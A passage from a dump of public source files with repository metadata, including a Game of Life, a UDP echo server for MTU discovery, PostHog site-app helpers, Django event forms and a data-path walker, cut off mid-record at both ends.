{}\".format(high_accuracy, expected_high_confidence_correct,\n high_confidence_threshold)))\n\n\nclass TestSubfigureDetection(unittest.TestCase):\n\n def setUp(self):\n \"\"\" Instantiates a test search query and FigureSeparator to test \"\"\"\n nature_json = pathlib.Path(__file__).parent / 'data' / 'nature_test.json'\n with open(nature_json, \"r\") as f:\n query = json.load(f)\n self.query = query\n self.figure_separator = figure.FigureSeparator(query)\n\n def test_subfigure_detection_accuracy(self):\n \"\"\" Tests the accuracy and validity of identifying subfigures \"\"\"\n pass\n\n def test_subfigure_label_reading_accuracy(self):\n \"\"\" Tests the accuracy and validity of reading subfigure labels \"\"\"\n pass\n\n def test_subfigure_classification_accuracy(self):\n \"\"\" Tests the accuracy and validity of classifying subfigures \"\"\"\n pass\n\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"MaterialEyes/exsclaim","sub_path":"exsclaim/tests/accuarcy_test.py","file_name":"accuarcy_test.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"73208185447","text":"from .parametric_curve import ParametricCurve\nfrom .interval import Interval\n\nimport numpy as np\n\n\nclass Circle(ParametricCurve):\n # A circle in R^2.\n\n def __init__(self, radius, centre):\n \"\"\"\n Parameters\n ----------\n radius The radius of the circle.\n centre The centre of the circle.\n \"\"\"\n\n self.centre = centre\n self.radius = radius\n super().__init__(\n lambda t: self.centre[0] + self.radius * np.cos(t),\n lambda t: self.centre[1] + self.radius * np.sin(t),\n Interval(0, 2 * np.pi)\n )","repo_name":"lorenzoliuzzo/scippy","sub_path":"src/mathematics/curves/circle.py","file_name":"circle.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39512814139","text":"from dataclasses import asdict, dataclass\nfrom hashlib import md5\nfrom typing import TYPE_CHECKING, List, Optional\n\nif TYPE_CHECKING:\n from posthog.models import Team\n\n\n@dataclass\nclass WebJsSource:\n id: int\n source: str\n token: str\n config_schema: List[dict]\n config: dict\n\n\n@dataclass\nclass WebJsUrl:\n id: int\n url: str\n\n\ndef get_transpiled_site_source(id: int, token: str) -> Optional[WebJsSource]:\n from posthog.models import PluginConfig, PluginSourceFile\n\n response = (\n PluginConfig.objects.filter(\n id=id,\n web_token=token,\n enabled=True,\n plugin__pluginsourcefile__filename=\"site.ts\",\n plugin__pluginsourcefile__status=PluginSourceFile.Status.TRANSPILED,\n )\n .values_list(\n \"id\",\n \"plugin__pluginsourcefile__transpiled\",\n \"web_token\",\n \"plugin__config_schema\",\n \"config\",\n )\n .first()\n )\n\n if not response:\n return None\n\n return WebJsSource(*(list(response))) # type: ignore\n\n\ndef get_decide_site_apps(team: \"Team\", using_database: str = \"default\") -> List[dict]:\n from posthog.models import PluginConfig, PluginSourceFile\n\n sources = (\n PluginConfig.objects.using(using_database)\n .filter(\n team=team,\n enabled=True,\n plugin__pluginsourcefile__filename=\"site.ts\",\n plugin__pluginsourcefile__status=PluginSourceFile.Status.TRANSPILED,\n )\n .values_list(\n \"id\",\n \"web_token\",\n \"plugin__pluginsourcefile__updated_at\",\n \"plugin__updated_at\",\n \"updated_at\",\n )\n .all()\n )\n\n def site_app_url(source: tuple) -> str:\n hash = md5(f\"{source[2]}-{source[3]}-{source[4]}\".encode(\"utf-8\")).hexdigest()\n return f\"/site_app/{source[0]}/{source[1]}/{hash}/\"\n\n return [asdict(WebJsUrl(source[0], site_app_url(source))) for source in sources]\n\n\ndef get_site_config_from_schema(config_schema: Optional[List[dict]], config: Optional[dict]):\n if not config or not config_schema:\n return {}\n return {\n schema_element[\"key\"]: config.get(schema_element[\"key\"], schema_element.get(\"default\", None))\n for schema_element in config_schema\n if schema_element.get(\"site\", False) and schema_element.get(\"key\", False)\n }\n","repo_name":"PostHog/posthog","sub_path":"posthog/plugins/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"1890328886","text":"import sys\nfrom socket import *\n\ns = socket(AF_INET, SOCK_DGRAM)\ns.bind((\"0.0.0.0\", int(sys.argv[1])))\n\nprint(\"Listening...\")\nwhile 1:\n\tmsg, addr = s.recvfrom(65536)\n\tprint(\"Received %d bytes from %s\" % (len(msg) + 20 + 8, str(addr)))\n\ts.sendto(msg, addr)\n","repo_name":"Kavarenshko/plp-mtu-discovery","sub_path":"udp_server.py","file_name":"udp_server.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"18551250138","text":"import random\nimport sys\nfrom datetime import datetime\nimport pygame\nimport copy\nimport numpy as np\n\n\nclass LifeGame:\n\tdef __init__(self, screen_width=800, screen_height=600, cell_size=10, alive_color=(0, 255, 255),\n\t\t\t\t dead_color=(0, 0, 0), max_fps=10):\n\n\t\tpygame.init()\n\t\tself.screen_width = screen_width\n\t\tself.screen_height = screen_height\n\t\tself.cell_size = cell_size\n\t\tself.alive_color = alive_color\n\t\tself.dead_color = dead_color\n\n\t\tself.screen = pygame.display.set_mode((self.screen_width, self.screen_height))\n\t\tself.clear_screen()\n\t\tpygame.display.flip()\n\n\t\tself.last_update_completed = 0\n\t\tself.desired_milliseconds_between_updates = (1.0 / max_fps) * 1000.0\n\n\t\tself.num_cols = int(self.screen_width / self.cell_size)\n\t\tself.num_rows = int(self.screen_height / self.cell_size)\n\t\tself.active_grid = 0\n\t\tself.grids = []\n\n\t\tself.init_grids()\n\t\tself.set_grid()\n\n\t\tself.paused = False\n\t\tself.game_over = False\n\n\tdef init_grids(self):\n\n\t\tdef create_grid():\n\t\t\trows = []\n\t\t\tfor row_num in range(self.num_rows):\n\t\t\t\tlist_of_columns = [0] * self.num_cols\n\t\t\t\trows.append(list_of_columns)\n\t\t\treturn rows\n\n\t\tself.grids.append(create_grid())\n\t\tself.grids.append(create_grid())\n\n\tdef set_grid(self, value=None, grid=0):\n\t\tfor r in range(self.num_rows):\n\t\t\tfor c in range(self.num_cols):\n\t\t\t\tif value is None:\n\t\t\t\t\tcell_value = np.random.choice([0, 255], p=[0.8, 0.2])\n\t\t\t\telse:\n\t\t\t\t\tcell_value = value\n\t\t\t\tself.grids[grid][r][c] = cell_value\n\n\tdef draw_grid(self):\n\t\tself.clear_screen()\n\t\tfor r in range(self.num_rows):\n\t\t\tfor c in range(self.num_cols):\n\t\t\t\tif self.grids[self.active_grid][r][c] == 255:\n\t\t\t\t\tcolor = self.alive_color\n\t\t\t\telse:\n\t\t\t\t\tcolor = self.dead_color\n\t\t\t\tpygame.draw.circle(self.screen,\n\t\t\t\t\t\t\t\t color,\n\t\t\t\t\t\t\t\t (int(c * self.cell_size + (self.cell_size / 2)),\n\t\t\t\t\t\t\t\t\tint(r * self.cell_size + (self.cell_size / 2))),\n\t\t\t\t\t\t\t\t int(self.cell_size / 2),\n\t\t\t\t\t\t\t\t 0)\n\t\tpygame.display.flip()\n\n\tdef clear_screen(self):\n\t\tself.screen.fill(self.dead_color)\n\n\tdef inactive_grid(self):\n\t\tinactive_grid = (self.active_grid + 1) % 2\n\t\treturn inactive_grid\n\n\tdef check_cell_neighbors(self, row_index, col_index, grid):\n\t\t# self.grids[self.active_grid][r][c] # current cell\n\t\ttotal = int((grid[row_index][(col_index - 1) % self.num_cols] + grid[row_index][(col_index + 1) % self.num_cols] +\n\t\t\t\t\t grid[(row_index - 1) % self.num_rows][col_index] + grid[(row_index + 1) % self.num_rows][col_index] +\n\t\t\t\t\t grid[(row_index - 1) % self.num_rows][(col_index - 1) % self.num_cols] +\n\t\t\t\t\t grid[(row_index - 1) % self.num_rows][(col_index + 1) % self.num_cols] +\n\t\t\t\t\t grid[(row_index + 1) % self.num_rows][(col_index - 1) % self.num_cols] +\n\t\t\t\t\t grid[(row_index + 1) % self.num_rows][(col_index + 1) % self.num_cols])/255)\n\n\t\t# Apply rules\n\t\tval = int()\n\t\tif grid[row_index][col_index] == 255:\n\t\t\tif (total < 2) or (total > 3):\n\t\t\t\tval = 0\n\t\t\telse:\n\t\t\t\tval = grid[row_index][col_index]\n\t\telse:\n\t\t\tif total == 3:\n\t\t\t\tval = 255\n\t\treturn val\n\n\tdef update_generation(self):\n\t\t# TODO\n\t\t# Inspect the current active generation\n\t\tgrid = copy.deepcopy(self.grids[self.active_grid])\n\t\tfor r in range(self.num_rows):\n\t\t\tfor c in range(self.num_cols):\n\t\t\t\tnext_gen_state = self.check_cell_neighbors(r, c, grid)\n\t\t\t\tself.grids[self.inactive_grid()][r][c] = next_gen_state\n\n\t\tself.active_grid = self.inactive_grid()\n\n\tdef handle_events(self):\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.KEYDOWN:\n\t\t\t\tprint(\"Key pressed\")\n\t\t\t\tif event.unicode == 's':\n\t\t\t\t\tif self.paused:\n\t\t\t\t\t\tself.paused = False\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.paused = True\n\t\t\t\telif event.unicode == 'r':\n\t\t\t\t\tself.active_grid = 0\n\t\t\t\t\tself.set_grid(None, self.active_grid)\n\t\t\t\t\tself.draw_grid()\n\t\t\t\telif event.unicode == 'q':\n\t\t\t\t\tself.game_over = True\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tsys.exit()\n\n\tdef cap_frame_rate(self):\n\t\tnow = pygame.time.get_ticks()\n\t\tmillieseconds_since_last_update = now - self.last_update_completed\n\t\ttime_to_sleep = self.desired_milliseconds_between_updates - millieseconds_since_last_update\n\t\tif time_to_sleep > 0:\n\t\t\tpygame.time.delay(int(time_to_sleep))\n\t\tself.last_update_completed = now\n\n\tdef run(self):\n\t\twhile True:\n\t\t\tif self.game_over:\n\t\t\t\treturn\n\t\t\tself.handle_events()\n\n\t\t\tif self.paused:\n\t\t\t\tcontinue\n\n\t\t\tself.update_generation()\n\t\t\tself.draw_grid()\n\t\t\tself.cap_frame_rate()\n\n\nif __name__ == '__main__':\n\tgame = LifeGame()\n\tgame.run()\n","repo_name":"0imami0/GOL","sub_path":"GOL2.py","file_name":"GOL2.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35901760896","text":"import modules\r\n\r\nprint(\"Welcome to the flip a coin game! You can pick how many times you want to flip a coin, and this program will tell you how many were heads and how many were tails.\\nLet's Begin!\")\r\n\r\nwhile True:\r\n\r\n num = modules.ask()\r\n\r\n results = modules.flip_count(num)\r\n\r\n print(\r\n f\"Over {num} fiips, the results are {results[0]} heads and {results[1]} tails!\\n\")\r\n\r\n if input(\"Would you like to play again? (y/n): \").lower() == 'y':\r\n continue\r\n else:\r\n print(\"Thanks for playing!\")\r\n break\r\n","repo_name":"darth4114/CoinFlipSim","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20522966272","text":"from typing import Union, Optional, Dict, Any, AsyncGenerator, List\nfrom .base_storage import BaseStorage\nfrom ..logger import LOGGER\n\n\nclass MemoryStorage(BaseStorage):\n def __init__(self, default_language: str = 'en'):\n super().__init__(default_language=default_language)\n self._message_history: Dict[str, int] = dict()\n\n async def set_user_language(self, user_id: int, language: str):\n await super().set_user_language(user_id=user_id, language=language)\n if not self.users.get(str(user_id)): # Check if user exists so it won't fail\n self.users[str(user_id)] = {}\n\n self.users[str(user_id)]['language'] = language\n LOGGER.info(f'Set language to {language} for {user_id}')\n\n async def get_user_language(self, user_id: int) -> str:\n lang = self.users.get(str(user_id), {}).get('language', self.default_language)\n await super().set_user_language(user_id=user_id, language=lang)\n LOGGER.info(f'Retrieved language for {user_id}: {lang}')\n return lang\n\n async def set_user_data(self, user_id: int, data: Optional[Dict[str, Any]] = None,\n replace: bool = False) -> Dict[str, Any]:\n if data is None:\n data = dict()\n replace = True\n\n if replace:\n user_data = data\n else:\n user_data = await self.get_user_data(user_id=user_id)\n user_data.update(data)\n\n if not self.users.get(str(user_id)): # Check if user exists so it won't fail\n self.users[str(user_id)] = {}\n\n self.users[str(user_id)]['data'] = user_data\n LOGGER.info(f'Set user data for {user_id}: {user_data}')\n return user_data\n\n async def get_user_data(self, user_id: int) -> Dict[str, Any]:\n data = self.users.get(str(user_id), {}).get('data', {})\n LOGGER.info(f'Fetched user data for {user_id}: {data}')\n return data\n\n async def set_user_menu(self, user_id: int, menu: Optional[str] = None):\n await self.set_user_data(user_id=user_id, data={'menu': menu})\n return menu\n\n async def get_user_menu(self, user_id: int) -> Optional[str]:\n return (await self.get_user_data(user_id=user_id)).get('menu')\n\n async def check_user_exists(self, user_id: int) -> bool:\n exists: bool = bool(self.users.get(str(user_id)))\n LOGGER.info(f'Checked existence of {user_id}: {exists}')\n return exists\n\n async def set_last_message_id(self, user_id: int, message_id: int):\n LOGGER.info(f'Set last message ID for {user_id}: {message_id}')\n self._message_history[str(user_id)] = message_id\n\n async def get_last_message_id(self, user_id: int) -> Optional[int]:\n message_id = self._message_history.get(str(user_id))\n LOGGER.info(f'Retrieved last message ID for {user_id}: {message_id}')\n return message_id\n\n async def create_user(self, user_id: int, language: Optional[str] = None):\n if language is None:\n language = self.default_language\n\n self.users[str(user_id)] = {'language': language}\n LOGGER.info(f'Created a new user: {user_id}, {language}')\n\n async def apply(self, query, args=None):\n pass\n\n async def select(self, query, args=None) -> AsyncGenerator[Dict[str, Any], None]:\n yield\n\n async def get(self, query: str, args=None, fetch_all: bool = False) -> Union[bool, List[Dict[str, Any]],\n Dict[str, Any]]:\n pass\n\n async def check(self, query: str, args=None) -> int:\n pass\n","repo_name":"lyteloli/NekoGramBMICalculator","sub_path":"NekoGram/storages/memory_storage.py","file_name":"memory_storage.py","file_ext":"py","file_size_in_byte":3614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74271640169","text":"from django import forms\nfrom datetime import date, datetime, timedelta\n\nfrom events.models import Event\nfrom events.models import Who, When, Event\nfrom profiles.models import ClassGroup, User\nfrom pedagogy.models import Subject, SubjectModality\nfrom locations.models import Place, Campus\n\nfrom utils.widgets import SelectableTimeWidget\nfrom utils.fields import UserChoiceField\n\nclass UserEventForm(forms.Form):\n name = forms.CharField(label=\"Event name\")\n date = forms.DateField(widget=forms.DateInput(attrs={'class':'datepicker'}))\n start_hour = forms.IntegerField(widget=SelectableTimeWidget())\n duration = forms.IntegerField(widget=SelectableTimeWidget(end_hour=5))\n place_text = forms.CharField(label=\"Place\", required=False)\n\n def _build_event(self, old_when=None):\n if self.is_valid():\n old_id = None\n if old_when:\n old_id = old_when.event.id\n event = Event(name=self.cleaned_data['name'],\n duration=self.cleaned_data['duration'],\n place_text=self.cleaned_data['place_text'],\n id=old_id)\n return event\n\n def _build_when(self, old_when=None):\n if self.is_valid():\n old_id = None\n if old_when:\n old_id = old_when.id\n correct_date = \"%s %s\" % (self.cleaned_data['date'],\n self.cleaned_data['start_hour'])\n correct_date = datetime.strptime(correct_date, \"%Y-%m-%d %H\")\n when = When(date=correct_date, id=old_id)\n return when\n\n def save(self, when=None):\n if self.is_valid():\n event = self._build_event(when)\n when = self._build_when(when)\n event.save()\n when.event = event\n when.save()\n return when\n return False\n\n#capitaine skeletor pour le reste des forms du campus manager\nclass ClassgroupEventForm(UserEventForm):\n user = None\n classgroup = forms.ModelChoiceField(queryset=None, label=\"Class\")\n subject = forms.ModelChoiceField(queryset=Subject.objects.all(),\n label=\"Subject\")\n modality = forms.CharField(max_length=20,\n widget=forms.Select(choices=SubjectModality.TYPE_CHOICES))\n place = forms.ModelChoiceField(queryset=None, label=\"Place\")\n contributor = UserChoiceField(\n queryset=User.objects.filter(profile__is_teacher=True),\n label=\"Teacher\", required=False)\n force_display = forms.BooleanField(required=False)\n \n def __init__(self, user=None, *args, **kwargs):\n super(ClassgroupEventForm,self).__init__(*args, **kwargs)\n self.user = user\n self.fields['classgroup'].queryset = ClassGroup.objects\\\n .get_managed_by(self.user)\n self.fields['place'].queryset = Place.objects.get_managed_by(self.user)\n \n def _build_classgroup(self, old_when=None):\n if self.is_valid():\n old_id = None\n if old_when:\n old_id = old_when.event.who_set.get(classgroup__isnull=False).id\n return Who(classgroup=self.cleaned_data['classgroup'], id=old_id)\n\n def save(self, when=None): \n if self.is_valid(): \n f = self.cleaned_data \n event = self._build_event(when)\n event.force_display=self.cleaned_data['force_display']\n event.subject_modality = SubjectModality.objects.filter( \n subject=f['subject']).filter(type=f['modality']).get() \n event.save() \n event.places.clear()\n event.places.add(f['place']) \n who = self._build_classgroup(when)\n who.event = event\n who.save()\n\n # add teacher\n contributor = self.cleaned_data['contributor']\n if contributor is not None:\n teacher = Who(user=contributor, is_contributor=True, event=event)\n teacher.save()\n when = self._build_when(when)\n when.event = event\n when.save()\n return when\n return False\n\nclass CampusEventForm(UserEventForm):\n user = None\n \n campus = forms.ModelChoiceField(queryset=None,\n label=\"Campus\", required=False)\n place = forms.ModelChoiceField(queryset=None,\n label=\"Place\", required=False)\n contributor = UserChoiceField(\n queryset=User.objects.filter(profile__is_teacher=True),\n label=\"Main Contributor\", required=False)\n force_display = forms.BooleanField(required=False)\n \n def __init__(self, user=None, *args, **kwargs):\n super(CampusEventForm,self).__init__(*args, **kwargs)\n self.user = user\n self.fields['place'].queryset = Place.objects.get_managed_by(self.user)\n self.fields['campus'].queryset = Campus.objects.get_managed_by(self.user)\n\n def _build_campus(self, old_when=None):\n if self.is_valid():\n old_id = None\n if old_when:\n old_id = old_when.event.who_set.get(campus__isnull=False).id\n return Who(campus=self.cleaned_data['campus'], id=old_id)\n\n def save(self, when=None):\n if self.is_valid():\n event = self._build_event(when)\n event.force_display=self.cleaned_data['force_display']\n event.save()\n if self.cleaned_data['place'] is not None:\n event.places.clear()\n event.places.add(self.cleaned_data['place']) \n who = self._build_campus(when)\n who.event = event\n who.save()\n when = self._build_when(when)\n when.event = event\n when.save()\n return when\n return False\n \nclass MoveEventForm(forms.Form):\n days = forms.IntegerField()\n minutes = forms.IntegerField()\n all_day = forms.BooleanField()\n\n \nclass MySelectorForm(forms.Form):\n user = None\n calendars = forms.MultipleChoiceField(choices=\n [(\"my_campus\", \"My Campus\"),\n (\"my_classgroup\", \"My Class\"),\n (\"my_user\", \"Mine\")],\n widget=forms.CheckboxSelectMultiple())\n def __init__(self, what=[], *args, **kwargs):\n super(MySelectorForm,self).__init__(*args, **kwargs)\n if what == []:\n self.initial['calendars'] = (\"my_user\", \"my_classgroup\")\n return\n new_choices = []\n for option in self.fields['calendars'].choices:\n if option[0] in what:\n new_choices.append(option)\n self.fields['calendars'].choices = new_choices\n self.initial['calendars'] = (\"my_user\",)\n\nclass CampusSelectorForm(forms.Form):\n user = None\n campus = forms.ModelMultipleChoiceField(queryset=None,\n widget=forms.CheckboxSelectMultiple())\n def __init__(self, user=None, *args, **kwargs):\n super(CampusSelectorForm,self).__init__(*args, **kwargs)\n self.user = user\n self.fields['campus'].queryset =\\\n Campus.objects.get_managed_by(self.user)\n\nclass ClassgroupSelectorForm(forms.Form):\n user = None\n classgroup = forms.ModelMultipleChoiceField(queryset=None,\n widget=forms.CheckboxSelectMultiple())\n def __init__(self, user=None, *args, **kwargs):\n super(ClassgroupSelectorForm,self).__init__(*args, **kwargs)\n self.user = user\n self.fields['classgroup'].queryset =\\\n ClassGroup.objects.get_managed_by(self.user)\n\n","repo_name":"easytimetable/easytimetable","sub_path":"easytimetable/events/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":7430,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"71486885927","text":"from urllib import request\nfrom project import Project\nimport toml\n\n\nclass ProjectReader:\n def __init__(self, url):\n self._url = url\n\n def get_project(self):\n # tiedoston merkkijonomuotoinen sisältö\n content = request.urlopen(self._url).read().decode(\"utf-8\")\n\n toml_dict=toml.loads(content)\n\n p_name=toml_dict[\"tool\"][\"poetry\"][\"name\"]\n p_description=toml_dict[\"tool\"][\"poetry\"][\"description\"]\n p_dependencies=toml_dict[\"tool\"][\"poetry\"][\"dependencies\"]\n p_dev_dependencies=toml_dict[\"tool\"][\"poetry\"][\"dev-dependencies\"]\n # deserialisoi TOML-formaatissa oleva merkkijono ja muodosta Project-olio sen tietojen perusteella\n return Project(p_name, p_description, p_dependencies.keys(), p_dev_dependencies.keys())\n","repo_name":"Nanotiike/palautusrepositorio","sub_path":"viikko2/project-reader/src/project_reader.py","file_name":"project_reader.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15888706862","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef get_data(fname):\n data = np.loadtxt(fname, delimiter=\",\")\n data[:, 1:] = data[:, 0, None] / (data[:, 1:] / 1000)\n data[:, 0] *= 1000000\n return data\n\nfig, axes = plt.subplots(1, 2, figsize=[15, 7])\nfnames = [\"result_32.csv\", \"result_64.csv\"]\ntitles = [\"Sort 32-bit key-value pairs\", \"Sort 64-bit key-value pairs\"]\nfor i in range(2):\n data = get_data(fnames[i])\n axes[i].grid(which=\"major\")\n axes[i].set_xscale(\"log\")\n axes[i].plot(data[:, 0], data[:, 1], data[:, 0], data[:, 2], data[:, 0], data[:, 3])\n axes[i].legend([\"CUB merge sort\", \"CUB radix sort\", \"Bitonic sort\"])\n axes[i].set_xlabel(\"Number of elements\")\n axes[i].set_ylabel(\"Sort rate (million elements / second)\")\n axes[i].set_title(titles[i])\n \nfig.suptitle(\"Performance comparison of different sorting algorithms\")\nplt.tight_layout()\nplt.savefig(\"benchmark.png\")","repo_name":"hanzhi713/bitonic-sort","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24878875197","text":"\"\"\"Edit the RWhois data on the account.\"\"\"\n# :license: MIT, see LICENSE for more details.\n\nimport click\n\nimport SoftLayer\nfrom SoftLayer.CLI import environment\nfrom SoftLayer.CLI import exceptions\n\n\n@click.command()\n@click.option('--abuse', help='Set the abuse email address')\n@click.option('--address1', help='Update the address 1 field')\n@click.option('--address2', help='Update the address 2 field')\n@click.option('--city', help='Set the city name')\n@click.option('--company', help='Set the company name')\n@click.option('--country', help='Set the two-letter country code')\n@click.option('--firstname', help='Update the first name field')\n@click.option('--lastname', help='Update the last name field')\n@click.option('--postal', help='Set the postal code field')\n@click.option('--public/--private',\n default=None,\n help='Flags the address as a public or private residence.')\n@click.option('--state', help='Set the two-letter state code')\n@environment.pass_env\ndef cli(env, abuse, address1, address2, city, company, country, firstname,\n lastname, postal, public, state):\n \"\"\"Edit the RWhois data on the account.\"\"\"\n mgr = SoftLayer.NetworkManager(env.client)\n\n update = {\n 'abuse_email': abuse,\n 'address1': address1,\n 'address2': address2,\n 'company_name': company,\n 'city': city,\n 'country': country,\n 'first_name': firstname,\n 'last_name': lastname,\n 'postal_code': postal,\n 'state': state,\n 'private_residence': public,\n }\n\n if public is True:\n update['private_residence'] = False\n elif public is False:\n update['private_residence'] = True\n\n check = [x for x in update.values() if x is not None]\n if not check:\n raise exceptions.CLIAbort(\n \"You must specify at least one field to update.\")\n\n mgr.edit_rwhois(**update)\n","repo_name":"itirohidaka/PowerOff-Functions","sub_path":"virtualenv/lib/python2.7/site-packages/SoftLayer/CLI/rwhois/edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":1891,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"4560170084","text":"from datapath import constants as c\nfrom datapath.format import compact_path\nfrom datapath.util import BranchingList, guess_type\n\n\ndef walk(data, function, root=None, parent=None, key=None, path=None):\n if root is None:\n root = data\n\n if path is None:\n path = BranchingList()\n\n data_type = guess_type(data)\n\n instruction = function(\n data=data, data_type=data_type, parent=parent, key=key, path=path)\n\n if instruction != c.WALK_CONTINUE:\n return instruction\n\n if data_type == c.TYPE_LEAF:\n return\n elif data_type == c.TYPE_DICT:\n items = data.iteritems()\n elif data_type == c.TYPE_LIST:\n items = enumerate(data)\n\n # Prevent changing size:\n items = tuple(items)\n\n for key, item in items:\n instruction = walk(\n # Things that don't change\n function=function, root=root,\n\n # Things that do\n data=item, key=key, parent=data,\n path=path.add((c.KEY_LITERAL | data_type, key))\n )\n\n if instruction == c.WALK_PRUNE:\n break\n\n if instruction == c.WALK_TERMINATE:\n return c.WALK_TERMINATE\n\n\ndef walk_path(data, function, path_parts,\n on_missing=c.ON_MISSING_CONTINUE,\n on_mismatch=c.ON_MISMATCH_CONTINUE,\n root=None):\n\n context = {\n 'root': root or data,\n 'function': function,\n 'path_parts': path_parts,\n 'on_mismatch': on_mismatch,\n 'on_missing': on_missing,\n }\n\n return _walk_path(context, data=data, path_pos=0, parent=None, key=None,\n path=BranchingList())\n\n\n# ---------------- # -------------------------------------------------------- #\n# Internal methods #\n# ---------------- #\n\ndef _walk_path(context, data, path_pos, parent, key, path):\n data_type = guess_type(data)\n\n instruction = context['function'](\n # Things which change all the time\n data=data, data_type=data_type, path_pos=path_pos,\n parent=parent, key=key, path=path,\n\n # Things we calculate to be nice\n terminal=path_pos == len(context['path_parts']),\n\n **context)\n\n if instruction != c.WALK_CONTINUE:\n return instruction\n\n # We've run out of path\n if path_pos >= len(context['path_parts']):\n return\n\n key_type, key = context['path_parts'][path_pos]\n\n if key_type & c.TRAVERSAL_RECURSE:\n return _path_recursion(\n data=data, parent=parent, path=path, path_pos=path_pos,\n context=context)\n\n elif not key_type & data_type:\n if context['on_mismatch'] == c.ON_MISMATCH_FAIL:\n raise ValueError('Expected %s but found %s at %s: %s' % (\n c.STRINGS[key_type & c.TYPE_MASK],\n c.STRINGS[data_type],\n data,\n compact_path(context['path_parts'])\n ))\n\n elif context['on_mismatch'] == c.ON_MISMATCH_CONTINUE:\n return c.WALK_CONTINUE\n else:\n raise Exception('wut?')\n\n # It's a super mad recursion into the data structure\n\n # A literal, we know exactly where to go\n elif key_type & c.KEY_LITERAL:\n try:\n data[key]\n except (KeyError, IndexError):\n if context['on_missing'] == c.ON_MISSING_CONTINUE:\n return\n elif context['on_missing'] == c.ON_MISSING_CREATE:\n data = _auto_fill(data, data_type, key,\n context['path_parts'], path_pos)\n\n return _walk_path(\n context, data=data[key], key=key, parent=data,\n path=path.add((c.KEY_LITERAL | data_type, key, path_pos)),\n path_pos=path_pos + 1)\n\n elif key_type & (c.KEY_WILD | c.KEY_SLICE):\n # A wild key\n if key_type & c.KEY_WILD:\n if data_type & c.TYPE_LIST:\n keys = xrange(len(data))\n elif data_type & c.TYPE_DICT:\n keys = data.iterkeys()\n else:\n raise ValueError('Unknown sub-object type')\n\n # Then it's a slice\n else:\n if data_type & c.TYPE_LIST and isinstance(key, slice):\n stop = max(key.stop or 0, len(data))\n keys = xrange(*key.indices(stop))\n else:\n # Literal values\n keys = key\n\n for key in keys:\n # TODO! - Some copy paste here from above.\n try:\n data[key]\n except (KeyError, IndexError):\n if context['on_missing'] == c.ON_MISSING_CONTINUE:\n continue\n elif context['on_missing'] == c.ON_MISSING_CREATE:\n data = _auto_fill(data, data_type, key,\n context['path_parts'], path_pos)\n else:\n raise\n\n instruction = _walk_path(\n context, data=data[key], key=key,\n parent=data, path_pos=path_pos + 1,\n path=path.add((c.KEY_LITERAL | data_type, key, path_pos)))\n\n if instruction == c.WALK_PRUNE:\n break\n\n if instruction == c.WALK_TERMINATE:\n return c.WALK_TERMINATE\n\n else:\n raise Exception('Bad key type')\n\n\ndef _auto_fill(data, data_type, key, path_parts, path_pos):\n if path_pos >= len(path_parts) - 1:\n next_type = c.TYPE_LEAF\n else:\n next_type, _ = path_parts[path_pos + 1]\n\n next_factory = c.TYPE_CODE_TO_TYPE[c.TYPE_MASK & next_type]\n\n # Auto extend lists if required\n if data_type & c.TYPE_LIST:\n if len(data) <= key:\n data.extend([next_factory() for _ in xrange(1 + key - len(data))])\n\n else:\n data[key] = next_factory()\n\n return data\n\n\ndef _path_recursion(data, parent, path, path_pos, context):\n # Generate a mini path to look for\n path_part = context['path_parts'][path_pos]\n search_path = ((path_part[0] ^ c.TRAVERSAL_RECURSE, path_part[1]),)\n\n # First find all the eligible entities\n\n work_list = []\n\n # The general search will find all entities\n def _general_search(path, **kwargs):\n # The path aware search will search the search path for eligible\n # items to resume the main path walk\n def _back_to_walk_path(parent, key, data, data_type, **_):\n if parent is None and key is None:\n return\n\n work_list.append(\n dict(data=data, parent=parent, key=key,\n path=path.add((c.KEY_LITERAL | guess_type(parent),\n key, path_pos))))\n\n walk_path(kwargs['data'], _back_to_walk_path, search_path)\n\n walk(data=data,\n function=_general_search,\n parent=parent, key=None, path=path)\n\n # Now start walking through the paths in them. We do this so we don't\n # create new items as we are searching and recurse infinitely\n\n path_pos += 1\n\n for item in work_list:\n _walk_path(path_pos=path_pos, context=context, **item)\n","repo_name":"jon-betts/python-datapath","sub_path":"datapath/walk.py","file_name":"walk.py","file_ext":"py","file_size_in_byte":7037,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"31150187872","text":"'''\n문제\n그래프가 주어졌을 때, 그 그래프의 최소 스패닝 트리를 구하는 프로그램을 작성하시오.\n\n최소 스패닝 트리는, 주어진 그래프의 모든 정점들을 연결하는 부분 그래프 중에서 그 가중치의 합이 최소인 트리를 말한다.\n\n입력\n첫째 줄에 정점의 개수 V(1 ≤ V ≤ 10,000)와 간선의 개수 